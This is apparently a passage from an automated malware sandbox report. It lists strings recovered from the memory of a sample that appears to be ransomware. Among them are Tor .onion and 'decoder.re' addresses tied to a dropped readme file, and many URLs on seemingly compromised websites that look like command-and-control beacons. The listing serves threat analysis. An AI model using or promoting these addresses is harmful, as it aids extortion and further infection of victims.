          Source: tS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpString found in binary or memory: <a href="#" class="instagram"><img src="https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/images/instagram.png" class="img-fluid" /></a> <a href="#" class="facebook"><img src="https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/images/facebook.png" class="img-fluid" /></a> equals www.facebook.com (Facebook)
          Source: tS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.instagram.com/maratonadelisboa/" class="instagram" target="_blank"><img src="https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/images/instagram.png" class="img-fluid" /></a> <a href="https://www.facebook.com/MaratonaDeLisboa/" target="_blank" class="facebook"><img src="https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/images/facebook.png" class="img-fluid" /></a> equals www.facebook.com (Facebook)
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: <iframe style="width:100%;" frameborder="0" allowfullscreen src="https://www.youtube.com/embed/fxyo5CpHgqA"></iframe> equals www.youtube.com (Youtube)
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/YouBySia" /> equals www.facebook.com (Facebook)
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: <a target="_blank" href="https://www.youtube.com/watch?v=fxyo5CpHgqA&t=10s" class="btn-black btn-design hvr-float-shadow">Learn More</a> equals www.youtube.com (Youtube)
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: </html><li><a href="https://www.facebook.com/YouBySia" target="_blank"><i class="fab fa-facebook-f"></i></a></li> equals www.facebook.com (Facebook)
          Source: tS9P6wPz9x.exe, 00000000.00000003.474321416.00000000038CA000.00000004.00000001.sdmpString found in binary or memory: <a id="" class="uk-button custom " style="border: 1px solid rgba(255, 255, 255, 0.00); font-weight: 400; font-size: 1.00rem; color:rgba(255, 255, 255, 1.00);background-color: rgba(51, 51, 51, 1.00);border-radius: 50px; padding: 3px 10px; :hover{color: rgba(255, 255, 255, 1.00);background-color: rgba(226, 49, 57, 0.99);}" onmouseover="this.style='border: 1px solid rgba(255, 255, 255, 0.00); font-size: 1.00rem; background-color: rgba(226, 49, 57, 0.99); color: rgba(255, 255, 255, 1.00); border-radius: 50px; padding: 3px 10px; font-weight: 400';" onmouseout="this.style='border: 1px solid rgba(255, 255, 255, 0.00); font-size: 1.00rem; background-color: rgba(51, 51, 51, 1.00); color: rgba(255, 255, 255, 1.00); border-radius: 50px; padding: 3px 10px; font-weight: 400';" type="link" href="https://www.facebook.com/Trulynolenni/" target="_blank" rel="" ><span class="" uk-icon="icon: facebook; ratio: 1.30"></span></a> equals www.facebook.com (Facebook)
          Source: tS9P6wPz9x.exe, 00000000.00000003.474321416.00000000038CA000.00000004.00000001.sdmpString found in binary or memory: <a id="" class="uk-button custom " style="border: 1px solid rgba(255, 255, 255, 0.00); font-weight: 400; font-size: 1.00rem; color:rgba(255, 255, 255, 1.00);background-color: rgba(51, 51, 51, 1.00);border-radius: 50px; padding: 3px 10px; :hover{color: rgba(255, 255, 255, 1.00);background-color: rgba(226, 49, 57, 0.99);}" onmouseover="this.style='border: 1px solid rgba(255, 255, 255, 0.00); font-size: 1.00rem; background-color: rgba(226, 49, 57, 0.99); color: rgba(255, 255, 255, 1.00); border-radius: 50px; padding: 3px 10px; font-weight: 400';" onmouseout="this.style='border: 1px solid rgba(255, 255, 255, 0.00); font-size: 1.00rem; background-color: rgba(51, 51, 51, 1.00); color: rgba(255, 255, 255, 1.00); border-radius: 50px; padding: 3px 10px; font-weight: 400';" type="link" href="https://www.linkedin.com/in/neilstranney/" target="_blank" rel="" ><span class="" uk-icon="icon: linkedin; ratio: 1.30"></span></a> equals www.linkedin.com (Linkedin)
          Source: unknownDNS traffic detected: queries for: asgestion.com
          Source: tS9P6wPz9x.exe, 00000000.00000003.204300775.0000000002DF5000.00000004.00000040.sdmpString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/
          Source: tS9P6wPz9x.exe, 00000000.00000003.364421083.0000000002DF0000.00000004.00000040.sdmp, 4wfaj7427w-readme.txt.0.drString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/05EE5FC73EB66605
          Source: tS9P6wPz9x.exe, 00000000.00000003.537157164.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstr
          Source: tS9P6wPz9x.exe, 00000000.00000003.494446514.0000000000BE4000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
          Source: tS9P6wPz9x.exe, 00000000.00000003.552385040.0000000000BE1000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
          Source: tS9P6wPz9x.exe, 00000000.00000003.532898674.0000000000BE5000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godadd
          Source: tS9P6wPz9x.exe, 00000000.00000003.532898674.0000000000BE5000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/r
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/0
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/sfig2.crt0
          Source: tS9P6wPz9x.exe, 00000000.00000003.532898674.0000000000BE5000.00000004.00000001.sdmpString found in binary or memory: http://certs.godaddy.com/reposi
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: http://certs.godaddy.com/repository
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: http://certs.starfieldtech.com/repository/1402
          Source: tS9P6wPz9x.exe, 00000000.00000003.537157164.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsen
          Source: tS9P6wPz9x.exe, 00000000.00000003.494446514.0000000000BE4000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
          Source: tS9P6wPz9x.exe, 00000000.00000003.552472095.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.y
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsen
          Source: tS9P6wPz9x.exe, 00000000.00000003.537157164.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.o
          Source: tS9P6wPz9x.exe, 00000000.00000003.494446514.0000000000BE4000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
          Source: tS9P6wPz9x.exe, 00000000.00000003.475262020.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: tS9P6wPz9x.exe, 00000000.00000003.494465726.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: tS9P6wPz9x.exe, 00000000.00000003.475262020.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: tS9P6wPz9x.exe, 00000000.00000003.475105112.0000000000BDA000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAu
          Source: tS9P6wPz9x.exe, 00000000.00000003.475262020.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
          Source: tS9P6wPz9x.exe, 00000000.00000003.532898674.0000000000BE5000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: http://crl.i
          Source: tS9P6wPz9x.exe, 00000000.00000003.494446514.0000000000BE4000.00000004.00000001.sdmpString found in binary or memory: http://crl.identr3f
          Source: tS9P6wPz9x.exe, 00000000.00000003.537157164.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl
          Source: tS9P6wPz9x.exe, 00000000.00000003.494446514.0000000000BE4000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfig2s1-252.crl0c
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfig2s3-1.crl0b
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfroot-g2.crl0L
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfroot.crl0L
          Source: tS9P6wPz9x.exe, 00000000.00000003.552385040.0000000000BE1000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
          Source: tS9P6wPz9x.exe, 00000000.00000003.552385040.0000000000BE1000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
          Source: tS9P6wPz9x.exe, 00000000.00000003.494465726.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
          Source: tS9P6wPz9x.exe, 00000000.00000003.533010928.00000000038CD000.00000004.00000001.sdmpString found in binary or memory: http://dachdeckermeisterpatrickholzapfel.deinclude/images/zuqgvtakam.gif
          Source: tS9P6wPz9x.exe, 00000000.00000003.204300775.0000000002DF5000.00000004.00000040.sdmpString found in binary or memory: http://decoder.re/
          Source: tS9P6wPz9x.exe, 00000000.00000003.364421083.0000000002DF0000.00000004.00000040.sdmp, 4wfaj7427w-readme.txt.0.drString found in binary or memory: http://decoder.re/05EE5FC73EB66605
          Source: tS9P6wPz9x.exe, 00000000.00000003.204300775.0000000002DF5000.00000004.00000040.sdmp, 4wfaj7427w-readme.txt.0.drString found in binary or memory: http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/
          Source: tS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.536985973.00000000038ED000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.517359060.00000000038FC000.00000004.00000001.sdmpString found in binary or memory: http://gmpg.org/xfn/11
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: http://mailchi.mp/a586a5225aac/get-summer-ready-body
          Source: tS9P6wPz9x.exe, 00000000.00000003.475105112.0000000000BDA000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.co.
          Source: tS9P6wPz9x.exe, 00000000.00000003.475262020.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: tS9P6wPz9x.exe, 00000000.00000003.552385040.0000000000BE1000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
          Source: tS9P6wPz9x.exe, 00000000.00000003.468482047.0000000000BC0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
          Source: tS9P6wPz9x.exe, 00000000.00000003.533010928.00000000038CD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0%
          Source: tS9P6wPz9x.exe, 00000000.00000003.494465726.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0G
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/08
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0;
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0F
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.517359060.00000000038FC000.00000004.00000001.sdmpString found in binary or memory: http://ogp.me/ns#
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: http://ogp.me/ns/fb#
          Source: tS9P6wPz9x.exe, 00000000.00000003.537157164.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.or
          Source: tS9P6wPz9x.exe, 00000000.00000003.494446514.0000000000BE4000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0%
          Source: tS9P6wPz9x.exe, 00000000.00000003.494465726.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0)
          Source: tS9P6wPz9x.exe, 00000000.00000003.494465726.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0-
          Source: tS9P6wPz9x.exe, 00000000.00000003.494465726.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0.
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/01
          Source: tS9P6wPz9x.exe, 00000000.00000002.597408377.0000000000BAA000.00000004.00000020.sdmpString found in binary or memory: http://r3.i.lencr.org/03
          Source: tS9P6wPz9x.exe, 00000000.00000003.537209069.0000000000C0E000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/05
          Source: tS9P6wPz9x.exe, 00000000.00000003.537076311.00000000038C6000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/07
          Source: tS9P6wPz9x.exe, 00000000.00000003.517436386.0000000000BFD000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/09
          Source: tS9P6wPz9x.exe, 00000000.00000003.533049801.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0;
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0=
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0?
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: http://r3.i.lencr.org/0C
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0M
          Source: tS9P6wPz9x.exe, 00000000.00000002.597178188.0000000000B7E000.00000004.00000020.sdmpString found in binary or memory: http://r3.i.lencr.org/0i
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: http://r3.o.l9
          Source: tS9P6wPz9x.exe, 00000000.00000003.552472095.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org
          Source: tS9P6wPz9x.exe, 00000000.00000003.494446514.0000000000BE4000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
          Source: tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BreadcrumbList
          Source: tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/ListItem
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: http://social101.com/beauty-101you-by-sia-2/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: http://staging.you-bysia.com.au/about-us/#our-team
          Source: tS9P6wPz9x.exe, 00000000.00000003.552472095.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: http://www.brandl-blumen.de/static/assets/wuklveryuffb.png
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: http://www.brandl-blumen.de/static/assets/wuklveryuffb.pngI
          Source: tS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpString found in binary or memory: http://zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt0
          Source: tS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpString found in binary or memory: http://zerossl.ocsp.sectigo.com0
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://365questions.org/
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://365questions.org/=LA
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://365questions.org/P9
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.533049801.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://365questions.org/include/pics/oovmiwlu.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://365questions.org:443/include/pics/oovmiwlu.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: https://api.w.org/
          Source: tS9P6wPz9x.exe, 00000000.00000003.536985973.00000000038ED000.00000004.00000001.sdmpString found in binary or memory: https://bargningavesta.se/wp-json/
          Source: tS9P6wPz9x.exe, 00000000.00000003.475105112.0000000000BDA000.00000004.00000001.sdmpString found in binary or memory: https://baw.trulynolen.co.uk/
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://baylegacy.com:443/news/image/plvl.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpString found in binary or memory: https://bbsmobler.se/
          Source: tS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpString found in binary or memory: https://bbsmobler.se/W:S
          Source: tS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpString found in binary or memory: https://bbsmobler.se/static/assets/ugdl.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpString found in binary or memory: https://bbsmobler.se/static/assets/ugdl.pngC
          Source: tS9P6wPz9x.exe, 00000000.00000003.468365295.0000000000BFC000.00000004.00000001.sdmpString found in binary or memory: https://bbsmobler.se/static/assets/ugdl.pngW;R
          Source: tS9P6wPz9x.exe, 00000000.00000003.468365295.0000000000BFC000.00000004.00000001.sdmpString found in binary or memory: https://bbsmobler.se/wp-json/
          Source: tS9P6wPz9x.exe, 00000000.00000003.494465726.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://bbsmobler.se:443/static/assets/ugdl.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.475105112.0000000000BDA000.00000004.00000001.sdmpString found in binary or memory: https://bbylegacy.com/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://bookings.gettimely.com/youbysia/book
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://bookings.gettimely.com/youbysia/book?
          Source: tS9P6wPz9x.exe, 00000000.00000003.494465726.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://bxdf.info:443/content/pictures/gasjxkutrxct.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: https://certs.starfieldtY9R
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: https://certs.starfieldtech.com/repository/0
          Source: tS9P6wPz9x.exe, 00000000.00000003.533241518.0000000000C0B000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.533049801.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://conexa4papers.trade/data/pictures/ku.gif
          Source: tS9P6wPz9x.exe, 00000000.00000003.533241518.0000000000C0B000.00000004.00000001.sdmpString found in binary or memory: https://conexa4papers.trade/data/pictures/ku.gifC
          Source: tS9P6wPz9x.exe, 00000000.00000003.533049801.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://conexa4papers.trade:443/data/pictures/ku.gifpsvmkrt.pngmediaacademy-iraq.orgmediaacademy-ira
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.515240536.00000000038F6000.00000004.00000001.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/analyticsjs/
          Source: tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: https://digivod.de/feed/
          Source: tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: https://digivod.de/wp-
          Source: tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: https://digivod.de/wp-content/plugins/bst-dsgvo-cookie/includes/css/bst-mesage.css?ver=5.6.1
          Source: tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: https://digivod.de/wp-content/plugins/bst-dsgvo-cookie/includes/css/style.css?ver=5.6.1
          Source: tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: https://digivod.de/wp-includes/css/dist/block-library/style.min.css?ver=5.6.1
          Source: tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: https://digivod.de/wp-json/
          Source: tS9P6wPz9x.exe, 00000000.00000003.468482047.0000000000BC0000.00000004.00000001.sdmpString found in binary or memory: https://dontpassthepepper.com/1
          Source: tS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpString found in binary or memory: https://dontpassthepepper.com/wp-content/tmp/mitn.jpgt
          Source: tS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpString found in binary or memory: https://dontpassthepepper.com:443/wp-content/tmp/mitn.jpgo
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Lato:100
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: tS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Oswald
          Source: tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
          Source: tS9P6wPz9x.exe, 00000000.00000003.474321416.00000000038CA000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Ubuntu
          Source: tS9P6wPz9x.exe, 00000000.00000003.474321416.00000000038CA000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Ubuntu:400
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/anticslab/v9/bWt97fPFfRzkCa9Jlp6IacVcWkxq9Qs.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizYRExUiTo99u79D0e0w8mOAjcQ-woy.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizYRExUiTo99u79D0e0x8mOAjcQ-w.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizYRExUiTo99u79D0e0ycmOAjcQ-woy.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizYRExUiTo99u79D0e0ysmOAjcQ-woy.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizaRExUiTo99u79D0-Ew8OPIDUg-g.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizdRExUiTo99u79D0e8fOydIRUb0TA7i2bI.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizdRExUiTo99u79D0e8fOydIhUb0TA7i2bI.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizdRExUiTo99u79D0e8fOydKxUb0TA7i2bI.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v12/jizdRExUiTo99u79D0e8fOydLxUb0TA7iw.woff)
          Source: tS9P6wPz9x.exe, 00000000.00000002.597646329.0000000000BC0000.00000004.00000020.sdmpString found in binary or memory: https://gemeentehetkompas.nl/
          Source: tS9P6wPz9x.exe, 00000000.00000003.532818048.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://gemeentehetkompas.nl/wp-json/
          Source: tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://gmpg.org/xfn/11
          Source: tS9P6wPz9x.exe, 00000000.00000002.602165365.0000000002E15000.00000004.00000040.sdmpString found in binary or memory: https://havecamerawilltravel2017.wordpress.com/include/assets/afgilbpg.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.537209069.0000000000C0E000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/#website
          Source: tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/comments/feed/
          Source: tS9P6wPz9x.exe, 00000000.00000003.537157164.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/include/pics/ejtmxcqjwhdy.gif
          Source: tS9P6wPz9x.exe, 00000000.00000003.537209069.0000000000C0E000.00000004.00000001.sdmpString found in binary or memory: https://huehnerauge-entfernen.de/l
